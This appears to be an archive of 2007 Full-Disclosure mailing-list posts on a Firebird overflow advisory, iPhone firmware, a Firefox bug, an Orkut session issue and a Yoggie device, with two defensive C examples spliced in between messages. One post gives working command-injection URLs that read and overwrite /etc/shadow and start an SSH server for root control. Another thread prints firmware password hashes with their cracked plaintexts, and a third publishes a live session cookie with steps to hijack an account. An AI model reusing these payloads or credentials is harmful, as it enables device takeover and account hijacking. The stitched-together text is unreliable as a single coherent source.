Cody Pierce from TippingPoint DVLabs has discovered a buffer overflow when processing "connect" requests with an overly large "p_cnct_count" value.

Impact
======

An unauthenticated remote attacker could send a specially crafted request to a vulnerable server, possibly resulting in the execution of arbitrary code with the privileges of the user running Firebird.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Firebird users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-db/firebird-2.0.1"

References
==========

  [ 1 ] CVE-2007-3181
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3181

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200707-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
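The GLSA above describes the bug class behind CVE-2007-3181: a count field ("p_cnct_count") read from a network request and trusted when filling a fixed-size structure. The following C parser is an added illustration of the check such a field needs; it is not Gentoo's or Firebird's code, and its packet layout (a big-endian 32-bit count followed by that many 8-byte entries), the structure names and the MAX_PROTOCOLS limit are assumptions made for the example, not Firebird's real wire protocol.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Assumed layout for this example (not Firebird's protocol): a big-endian
 * 32-bit entry count, then `count` entries of PROTO_ENTRY_LEN bytes each. */
#define MAX_PROTOCOLS   10      /* capacity of the destination array */
#define PROTO_ENTRY_LEN 8       /* assumed size of one entry on the wire */

struct proto_entry { uint32_t version; uint32_t weight; };

struct connect_req {
    uint32_t count;
    struct proto_entry protos[MAX_PROTOCOLS];
};

static uint32_t get_be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Hardened parser. The unsafe shape of this loop reads `count` from the
 * packet and copies `count` entries into protos[] with no check, so a count
 * above MAX_PROTOCOLS writes past the array and a count above what was
 * actually received reads past the buffer. Both bounds are enforced here.
 * Returns 0 on success, -1 when the request is rejected. */
int parse_connect(const uint8_t *pkt, size_t len, struct connect_req *out) {
    if (len < 4)
        return -1;                                   /* no room for the count */
    uint32_t count = get_be32(pkt);
    if (count > MAX_PROTOCOLS)
        return -1;                                   /* bound by destination capacity */
    size_t need = 4 + (size_t)count * PROTO_ENTRY_LEN; /* no overflow: count <= 10 */
    if (need > len)
        return -1;                                   /* bound by bytes actually received */
    out->count = count;
    for (uint32_t i = 0; i < count; i++) {
        const uint8_t *e = pkt + 4 + (size_t)i * PROTO_ENTRY_LEN;
        out->protos[i].version = get_be32(e);
        out->protos[i].weight  = get_be32(e + 4);
    }
    return 0;
}

/* Test helper: build a packet whose header claims `claimed` entries but which
 * really carries `real` entries. Returns the packet length, 0 if it does not fit. */
size_t build_connect(uint8_t *buf, size_t cap, uint32_t claimed, uint32_t real) {
    size_t need = 4 + (size_t)real * PROTO_ENTRY_LEN;
    if (real > 64 || need > cap)
        return 0;
    put_be32(buf, claimed);
    for (uint32_t i = 0; i < real; i++) {
        put_be32(buf + 4 + i * PROTO_ENTRY_LEN, 0x1000u + i);   /* version */
        put_be32(buf + 8 + i * PROTO_ENTRY_LEN, i);             /* weight */
    }
    return need;
}

/* Build-then-parse in one call; returns parse_connect's result, -2 if the build failed. */
int parse_demo(uint32_t claimed, uint32_t real) {
    uint8_t buf[4 + 64 * PROTO_ENTRY_LEN];
    struct connect_req req;
    size_t len = build_connect(buf, sizeof buf, claimed, real);
    if (len == 0)
        return -2;
    return parse_connect(buf, len, &req);
}

/* Version parsed for entry `idx` of an honest n-entry request, 0 on any failure. */
uint32_t parsed_version(uint32_t n, uint32_t idx) {
    uint8_t buf[4 + 64 * PROTO_ENTRY_LEN];
    struct connect_req req;
    size_t len = build_connect(buf, sizeof buf, n, n);
    if (len == 0 || parse_connect(buf, len, &req) != 0 || idx >= req.count)
        return 0;
    return req.protos[idx].version;
}

int main(void) {
    printf("honest 2-entry request:       %d\n", parse_demo(2, 2));
    printf("count 0xFFFFFFFF, 2 entries:  %d\n", parse_demo(0xFFFFFFFFu, 2));
    printf("count 5, only 2 entries sent: %d\n", parse_demo(5, 2));
    return 0;
}
```

The two checks are deliberately separate: the first protects the destination array regardless of how much data arrived, the second protects the source buffer regardless of how large the array is. Dropping either one reintroduces a memory-safety bug, which is why a reviewer should expect to see both next to any loop driven by a count taken from the wire.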
From lists at infosecurity.ch Sun Jul 1 23:07:54 2007
From: lists at infosecurity.ch (Fabio Pietrosanti (naif))
Date: Mon, 02 Jul 2007 00:07:54 +0200
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: 
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com>
Message-ID: <468825BA.1050500@infosecurity.ch>

The file is a zip file.

It's interesting to note the encrypted DMG image "694-5262-39.dmg" of 82MB. It asks for a password.

The 15MB file "694-5259-38.dmg", instead, is not a DMG image and is not encrypted (strings 694-5259-38.dmg | less).

Some selected information to have an idea of what's inside:

DWD_USIF_BOOTLOADER_FILENAME/Secure_USIF_Bootloader.3.9.fls
MN_SMS_CB_MESSAGE_ID_LIMIT_IND
sio#wake-ind
SI_PHONE_NUMBER_READ_IND
../../ms-gprs-l1-src/text/l1d_rshd.c
../../ms-ds-src/at/atc/common/text/atc_sdl_mn.c
SIMULATED RESET due to AT+CFUN=16. This is NOT a crash!
../../ms-bt-src/src/bt-ctrl/io_bt.c
../../ms-gprs-l2-src/ma/mac/text/decoders/mac_decoders.c
../../ms-gprs-l2-src/rl/rlc/text/rlc_op2.c
../../ms-l3-src/rr/grr/text/grr_op2.c
1 ==> output of EQUALIZER RAW DATA acc. to using a Argument Types: [int: 1/2/3/4/5],[int:0/1/2/3],[int => abs. Hz value],[int: 1 - 100]
GSM Ciphering:%s, GSM Ciphering Algorithm: A5/%d, GPRS Ciphering:%s, GPRS Ciphering Algorithm: GEA/%d
/SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/IfxSource/DLL_source/OS_dependent_code/timer_if/../../../../IFWD_timer.c
/SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/AtInterface.cpp
/System/Library/PrivateFrameworks/Bom.framework/Bom
/SourceCache/Bom/Bom-122.0.0.3/Common/BOMSystemCmds.c
/dev/tty.baseband
/private/tmp/.SafeBoot
/bin/cat /System/Library/CoreServices/BootX | /usr/bin/openssl dgst -sha1 -hex -out /System/Library/Caches/com.apple.bootxsignature
Boot-loader is active
Skip secure loader
Injecting EBL-Loader (PSI).
DWD_RAM_BOOTLOADER_FILENAME/Default_RAM_Bootloader.7.0.fls
GsmRadioModule::fEnableMobileAnalyzer
Signature cannot be authenticated
single user shell terminated.
Singleuser boot -- fsck not done
sq->capacity >= (((((4096 + 7) / 8) + (sizeof(giantDigit)) - 1) / (sizeof(giantDigit))) + 1)
/System/Library/Lockdown/SBOOT_S5L8900.pem
/System/Library/Lockdown/SBOOT_S5L8900_DEV.pem

There are a couple of users with their password:

root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh

Does someone have some time to arrange a quick john session (should be quick)?

In Firmware/all_flash/all_flash.m68ap.production/DeviceTree.m68ap.img2 there is the string:
Apple Secure Boot Certification Authority1

* The password of the encrypted DMG?
* The users root and mobile with preconfigured passwords?
* The "GsmRadioModule::fEnableMobileAnalyzer"?
* The /SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/AtInterface.cpp that maybe uses AT commands to update the firmware of the GSM transceiver?
* What's bom? /System/Library/PrivateFrameworks/Bom.framework/Bom
* The security of the boot system, plenty of digital signatures to prevent firmware hacking?

-naif

Kevin Finisterre (lists) wrote:
> While you are at it...
> 
> http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/
> 061-3538.20070629.B7vXa/iPhone1,1_1.0_1A543a_Restore.ipsw
> 
> -KF
> 
> On Jun 29, 2007, at 8:10 PM, John Smith wrote:
> 
>> http://www.andrew.cmu.edu/user/xsk/iPhoneSecuritySettings.html
>> 
>> John

From e_tews at cdc.informatik.tu-darmstadt.de Sun Jul 1 23:20:37 2007
From: e_tews at cdc.informatik.tu-darmstadt.de (Erik Tews)
Date: Mon, 02 Jul 2007 00:20:37 +0200
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: <468825BA.1050500@infosecurity.ch>
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch>
Message-ID: <1183328437.4868.0.camel@localhost.localdomain>

On Monday, 02.07.2007, 00:07 +0200, Fabio Pietrosanti (naif) wrote:
> There are a couple of user with their password:
> 
> root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh
> mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh
> 
> Does someone have some time to arrange a quick john session (should be
> quick)?

Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS])
alpine           (mobile)
dottie           (root)
guesses: 2  time: 0:00:00:16 (3)  c/s: 551883  trying: royour - b1o2w8

Yes, it was quick
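The finding in this thread, an image shipping with fixed passwords for root and a second login-capable account, is something a firmware review can check for mechanically before anyone reaches for a cracker. The C program below is an added example, not code from the thread or from Apple: it parses passwd-style records in both the 7-field Linux form and the 10-field BSD/Darwin form quoted above and flags accounts that ship with a usable password hash, with an empty password, or with uid 0 under a name other than root. The sample records and the hash strings in it are constructed placeholders.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Findings for one record (bit flags). */
enum {
    F_EMPTY_PASSWORD = 1,  /* empty password field: login needs no password */
    F_HASH_PRESENT   = 2,  /* a real hash ships with the image: a fixed default credential */
    F_EXTRA_UID0     = 4,  /* a non-root name with uid 0 and a login shell */
};

/* Split s on ':' in place, keeping empty fields (strtok would merge them). */
static int split_colon(char *s, char *fields[], int max) {
    int n = 0;
    while (n < max) {
        fields[n++] = s;
        char *c = strchr(s, ':');
        if (c == NULL)
            break;
        *c = '\0';
        s = c + 1;
    }
    return n;
}

static int shell_is_interactive(const char *shell) {
    return shell[0] == '/' &&
           strcmp(shell, "/usr/sbin/nologin") != 0 &&
           strcmp(shell, "/sbin/nologin") != 0 &&
           strcmp(shell, "/bin/false") != 0;
}

/* Audit one record. Returns F_* bits, 0 when nothing is flagged, -1 when malformed. */
int audit_passwd_line(const char *line) {
    char buf[512];
    char *f[10];
    size_t len = strlen(line);
    if (len >= sizeof buf)
        return -1;
    memcpy(buf, line, len + 1);
    if (len > 0 && buf[len - 1] == '\n')
        buf[len - 1] = '\0';

    int n = split_colon(buf, f, 10);
    if ((n != 7 && n != 10) || strchr(f[n - 1], ':') != NULL)
        return -1;                                   /* not 7 or 10 fields */
    char *end;
    long uid = strtol(f[2], &end, 10);
    if (*f[2] == '\0' || *end != '\0')
        return -1;                                   /* uid is not numeric */

    const char *name = f[0], *pw = f[1], *shell = f[n - 1];
    int flags = 0;
    if (pw[0] == '\0')
        flags |= F_EMPTY_PASSWORD;
    else if (pw[0] != '*' && pw[0] != '!')           /* '*' and '!' mark locked accounts */
        flags |= F_HASH_PRESENT;
    if (uid == 0 && strcmp(name, "root") != 0 && shell_is_interactive(shell))
        flags |= F_EXTRA_UID0;
    return flags;
}

/* Audit a whole file held in memory. Returns the number of flagged records,
 * or -1 if any non-blank record is malformed. */
int audit_passwd_text(const char *text) {
    int flagged = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (n >= sizeof line)
            return -1;
        memcpy(line, p, n);
        line[n] = '\0';
        if (n > 0) {                                 /* skip blank lines */
            int r = audit_passwd_line(line);
            if (r < 0)
                return -1;
            if (r > 0)
                flagged++;
        }
        p = nl ? nl + 1 : p + n;
    }
    return flagged;
}

/* Constructed sample; the hash strings are placeholders, not real hashes. */
const char SAMPLE_PASSWD[] =
    "root:$6$salt$PLACEHOLDERHASH:0:0:root:/root:/bin/sh\n"              /* 7 fields, shipped hash */
    "daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"                  /* locked: nothing to flag */
    "admin::0:0::0:0:Admin:/var/admin:/bin/sh\n"                         /* 10 fields, empty pw, uid 0 */
    "mobile:PLACEHOLDER13:501:0::0:0:Mobile User:/var/mobile:/bin/sh\n"; /* 10 fields, shipped hash */

int main(void) {
    printf("flagged records: %d\n", audit_passwd_text(SAMPLE_PASSWD));
    return 0;
}
```

Run against the records quoted in the thread, both root and mobile would be flagged with F_HASH_PRESENT: the point of the check is that a hash in a shipped image is a credential shared by every device, whether or not it cracks in sixteen seconds.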
From steve at uptime.org.uk Sun Jul 1 23:32:00 2007
From: steve at uptime.org.uk (Stephen Hildrey)
Date: Sun, 01 Jul 2007 23:32:00 +0100
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: <468825BA.1050500@infosecurity.ch>
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch>
Message-ID: <46882B60.2010900@uptime.org.uk>

Fabio Pietrosanti (naif) wrote:
> root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh
> mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh

Nice find. Even my AMD 4200+ can cope with that...

$ john pw
Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS])
alpine           (mobile)
dottie           (root)

Steve

From leet16y at yahoo.com Mon Jul 2 10:01:45 2007
From: leet16y at yahoo.com (Joseph Hick)
Date: Mon, 2 Jul 2007 02:01:45 -0700 (PDT)
Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
In-Reply-To: <468665EA.60002@hrnz.net>
Message-ID: <166868.5267.qm@web38007.mail.mud.yahoo.com>

Oh! I was wrong. I didn't see file1's value is assigned to text1's value. Certainly, it is a flaw as nicely explained by Zalewski.

I wrote a PoC myself and found that it's not necessary to put focus on the label. Focussing the file input also works. I succeeded in writing the same PoC without label with minor modifications.

--- Martin Thurau wrote:

> i had exactly the same thoughts. the only thing to wonder is, why
> firefox process the actual input after it did the "onkeydown". but this
> is only "weird" and not a "flaw".
> 
> 
> Joseph Hick wrote:
> > i didn't understand your poc.
> > 
> > you are copying the value of textarea into the file
> > input yourself using this code.
> > 
> > document.getElementById("text1").value=document.getElementById("file1").value;
> > document.getElementById("text1").focus();
> > 
> > so how is it a flaw?
> > 
> > 
> > --- carl hardwick wrote:
> > 
> >> New flaw found in Firefox 2.0.0.4: Firefox file
> >> input focus vulnerabilities:
> >> [...]
> >> PoC here:
> >> http://yathong.googlepages.com/FirefoxFocusBug.html
> >> 
> >> credits by - Hong

From lcamtuf at dione.ids.pl Mon Jul 2 10:15:06 2007
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Mon, 2 Jul 2007 11:15:06 +0200 (CEST)
Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
In-Reply-To: <166868.5267.qm@web38007.mail.mud.yahoo.com>
References: <166868.5267.qm@web38007.mail.mud.yahoo.com>
Message-ID: 

On Mon, 2 Jul 2007, Joseph Hick wrote:

> I succeeded in writing the same PoC without label with minor
> modifications.

Would that allow you to selectively redirect keystrokes (that is, check event's keycode)? More importantly, does Carl's original example allow that? :-)

An example of event check logic is implemented in my original POC; if you can't redirect selectively (that is, prevent certain events from being delivered to INPUT TYPE=FILE field), the flaw is much less severe.

(Would check that, but am at work).

/mz

From leet16y at yahoo.com Mon Jul 2 10:41:01 2007
From: leet16y at yahoo.com (Joseph Hick)
Date: Mon, 2 Jul 2007 02:41:01 -0700 (PDT)
Subject: [Full-disclosure] Google/Orkut Authentication Issue PoC
In-Reply-To: <104580.93132.qm@web38011.mail.mud.yahoo.com>
Message-ID: <562020.96926.qm@web38014.mail.mud.yahoo.com>

It has been more than 36 hours and we have logged out of the account at least 10 times. The POC still works and my account can still be hijacked.
This proves the Net-Square report - "Google has fixed this problem on their side. session cookies are now set to expire within 24 hours from the server side, as opposed to two weeks." - to be wrong.

Moreover, expiry within 24 hours is not a fix. Expiry of session in 24 hours + expiry of session on logout + disabling the session on lockout is a fix.

--- Joseph Hick wrote:

> This is a proof of concept for Google Authentication
> issues posted in the threads...
> 
> 1.) http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/064143.html
> (Orkut Server Side Management Error by Susam Pal & Vipul Agarwal)
> 
> 2.) http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/064300.html
> (Google Re-authentication Bypass by Susam Pal)
> 
> I found that after logging out Google session doesn't
> expire in 24 hours. It is longer. I am doing this
> experiment to see how long the session remains alive
> after logging out.
> 
> I am posting a session cookie for my account.
> 
> Name: orkut_state
> Cookie:
> ORKUTPREF=ID=11190574376736842125:INF=0:SET=111236436:LNG=1:CNT=0:RM=0:USR=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:PHS=:TS=1183210062:LCL=en-US:NET=1:TOS=1:GC=DQAAAIMAAAArC-mJYqsrCOnv8uVQHdFUccRFQX8-ibRerEzrie5sOWNc06zs4z4fMNpovLUyRcNXHwxk8WzY6Z6SmvxcSmL1hAW4Mrdvazzkssq5VjSO70oE1HSFR4KOkSb3ZLg-U7k0x8c7ZuLHwu_qY2Umy8oobckg9UctWXYd1qoerXUTzsFSuLNXHdiAEVCSw7fUO00:PE=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:GTI=0:GID=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:VER=2:S=1Ah7VcA0JetHQ0Mgyfp4Jb6meXw=:
> Domain: .www.orkut.com
> Path: /
> Send for: Any type of session
> Expires: Expire at end of session
> 
> I have logged out but you can use this cookie in this
> way... (anyone can try this. You don't need Orkut
> account to try this)
> 
> 1.) Open Firefox, etc. which allows cookie editing.
> This extension is required...
> https://addons.mozilla.org/en-US/firefox/addon/573
> 
> 2.) Set the given cookie.
> 
> 3.) Try to visit http://www.orkut.com/Home.aspx
> 
> 4.) You will be automatically logged in with my
> account. It will not ask for any user-name or
> password.
> 
> 5.) Logout
> 
> 6.) Repeat steps 1. to 4. You can log in again.
> 
> I want to see how long this session remains alive
> after multiple logout. If you try this POC leave a
> message in the scrapbook of the account here ...
> http://www.orkut.com/Scrapbook.aspx
> 
> Thanks
> Joseph

From cody.brocious at gmail.com Mon Jul 2 12:00:31 2007
From: cody.brocious at gmail.com (Cody Brocious)
Date: Mon, 2 Jul 2007 07:00:31 -0400
Subject: [Full-disclosure] Yoggie Pico Pro Remote Code Execution
Message-ID: <4987c3660707020400h7294e8c4q9c3b8ca2b8aa3615@mail.gmail.com>

This vulnerability affects the Yoggie Pico Pro (and most certainly the Yoggie Pico, due to them being effectively identical) security appliance. They expose a 'ping' function in their web interface for diagnostic purposes, which passes the IP/hostname given directly to ping in the form of 'ping -c 10 '. They do basic checking for ampersands, semicolons, and pipes, but do not check for backticks, which allows you to execute commands as root on the device.

Proof of concept:

When run from a machine with a Yoggie Pico Pro connected, yoggie.yoggie.com resolves to the IP of the device, so these links will of course not work unless you have a device connected. I didn't brute-force the root password, so I explain how you can replace their /etc/shadow to set the password to whatever you choose.
To access the original /etc/shadow:

https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60cp%20/etc/shadow%20shadow.txt%60
https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt

Replace the root password with the password of your choosing, then wrap the file in single quotes and urlencode the entire string.

To replace the original /etc/shadow with your own:

https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60echo%20%20%3E%20/etc/shadow%60

Finally, running dropbear sshd on port 7290 (random choice -- not blocked by their firewall rules):

https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60/usr/sbin/dropbear%20-p%207290%60

Log in as root with the password chosen, and you now have complete control over the device. It's quite a powerful little computer, and a whole hell of a lot of fun to play around with. A word of advice, though -- don't touch libc in any way, shape, or form, as there's no reflash mechanism I've found on the device, which is why I now have a bricked pico pro sitting on my desk ;)

- Cody Brocious

From gautam.bipin at gmail.com Mon Jul 2 15:43:40 2007
From: gautam.bipin at gmail.com (Bipin Gautam)
Date: Mon, 2 Jul 2007 20:28:40 +0545
Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing?
In-Reply-To: 
References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com>
Message-ID: <8e5ffb560707020743u4cacb68crfbca18afa54cdc0e@mail.gmail.com>

On 7/1/07, Peter Ferrie wrote:
> The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem.
> 
> Peter

thanks for the paper...
http://www.symantec.com/avcenter/reference/Virtual_Machine_Threats.pdf

:)

From kf_lists at digitalmunition.com Mon Jul 2 16:12:55 2007
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Mon, 2 Jul 2007 11:12:55 -0400
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: <46882B60.2010900@uptime.org.uk>
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch> <46882B60.2010900@uptime.org.uk>
Message-ID: 

If anyone winds up with crash dumps from when Tunes syncs with the iPhone I wouldn't mind having a few of them. They should be located in /Library/Logs/CrashReporter/MobileDevice/

Weeeeee everything runs with Effective UID: 0

-KF

On Jul 1, 2007, at 6:32 PM, Stephen Hildrey wrote:

> Fabio Pietrosanti (naif) wrote:
>> root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh
>> mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh
> 
> Nice find. Even my AMD 4200+ can cope with that...
> 
> $ john pw
> Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS])
> alpine (mobile)
> dottie (root)
> 
> Steve

From mwollenweber at gmail.com Sun Jul 1 02:28:06 2007
From: mwollenweber at gmail.com (matthew wollenweber)
Date: Sat, 30 Jun 2007 21:28:06 -0400
Subject: [Full-disclosure] [Dailydave] iPhone Roadblock
Message-ID: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com>

I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far.
I'm not an Apple nut that buys all things Apple, but after years of "smartphones" that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. -- Matthew Wollenweber mwollenweber at gmail.com | mjw at cyberwart.com www.cyberwart.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070630/420aa8b0/attachment-0001.html -------------- next part -------------- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From jdo24 at cornell.edu Mon Jul 2 18:10:43 2007 From: jdo24 at cornell.edu (Joshua Ogle) Date: Mon, 2 Jul 2007 13:10:43 -0400 (EDT) Subject: [Full-disclosure] Best wireless card for packet capturing? 
Message-ID: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu>

Heya,

For some research I'm doing I need to capture packets using my laptop in a public space. What is the best wireless card for doing so which will work with most of the packet capturing software on Windows, such as Ethereal?

Thanks in advance for the help.

-Josh

From coderman at gmail.com Mon Jul 2 19:04:14 2007
From: coderman at gmail.com (coderman)
Date: Mon, 2 Jul 2007 11:04:14 -0700
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu>
Message-ID: <4ef5fec60707021104v3d2f4a85ge4a5fd4a61a6bea0@mail.gmail.com>

On 7/2/07, Joshua Ogle wrote:
> ...
> For some research I'm doing I need to capture packets using my laptop in a
> public space. What is the best wireless card for doing so which will work
> with most of the packet capturing software on Windows...

you'll want to get a copy of Airpcap drivers for win32. atheros or prism2 cards are my preference. ideally you should use multiple cards for best performance (built-in + 1 or 2 pccard?). remember that channel hopping affects capture, so locking on chan of interest is preferable to constantly hopping.

best regards,

From stacksmasher at gmail.com Mon Jul 2 19:05:10 2007
From: stacksmasher at gmail.com (Stack Smasher)
Date: Mon, 2 Jul 2007 14:05:10 -0400
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu>
Message-ID: <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com>

This is not the place to ask for a scooby snack or hand holding without getting attacked with a flamethrower, try the link below. They are very helpful to those just starting out.

http://www.binrev.com/forums/

-- 
"If you see me laughing, you better have backups"

On 7/2/07, Joshua Ogle wrote:
> Heya,
>
> For some research I'm doing I need to capture packets using my laptop in a
> public space. What is the best wireless card for doing so which will work
> with most of the packet capturing software on Windows, such as Ethereal?
> ...

From jdo24 at cornell.edu Mon Jul 2 19:13:27 2007
From: jdo24 at cornell.edu (Joshua Ogle)
Date: Mon, 2 Jul 2007 14:13:27 -0400 (EDT)
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com>
Message-ID: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu>

Thanks for the input. I'm not just starting out on capturing packets or anything -- after all, I'm doing research and writing about something very related -- it's just that in a Windows environment I know very little about how to do things. I'm a Linux guy when it comes to this kind of activity and I know that it's typically very difficult to do things "right" as far as security testing goes in a Windows environment. Unfortunately, given the circumstances of the research, I am only able to use a Windows-based laptop, but I've now found (thanks to a contributor to the list) a live CD which will help get into a Linux environment to do the work.

Thanks again to you and the others for your input.

-Josh

> This is not the place to ask for a scooby snack or hand holding without
> getting attacked with a flamethrower, try the link below. They are very
> helpful to those just starting out.
>
> http://www.binrev.com/forums/
> ...

From coderman at gmail.com Mon Jul 2 19:26:20 2007
From: coderman at gmail.com (coderman)
Date: Mon, 2 Jul 2007 11:26:20 -0700
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu>
Message-ID: <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com>

On 7/2/07, Joshua Ogle wrote:
> ... I've now found a live CD which will help get
> into a Linux environment to do the work.

speaking of which, when is backtrack going to get an updated aircrack-ng? :)
... beware airodump-ng till then.

From stacksmasher at gmail.com Mon Jul 2 19:32:18 2007
From: stacksmasher at gmail.com (Stack Smasher)
Date: Mon, 2 Jul 2007 14:32:18 -0400
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu>
Message-ID: <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com>

You have to understand the laptop and OS are just tools to obtain whatever information you need. Linux and Window$ are just a way of running applications to help you achieve your goal. Don't think of Linux as "Good" and "Windows" as bad as far as security is concerned. It's the mis-configured system and network in general that make it insecure. Not only that, windows keeps us security guys employed ; )

-- 
"If you see me laughing, you better have backups"

On 7/2/07, Joshua Ogle wrote:
> Thanks for the input. I'm not just starting out on capturing packets or
> anything -- after all, I'm doing research and writing about something very
> related -- it's just that in a Windows environment I know very little
> about how to do things.
> ...

From mike.vasquez at gmail.com Mon Jul 2 19:34:54 2007
From: mike.vasquez at gmail.com (Mike Vasquez)
Date: Mon, 2 Jul 2007 11:34:54 -0700
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com>
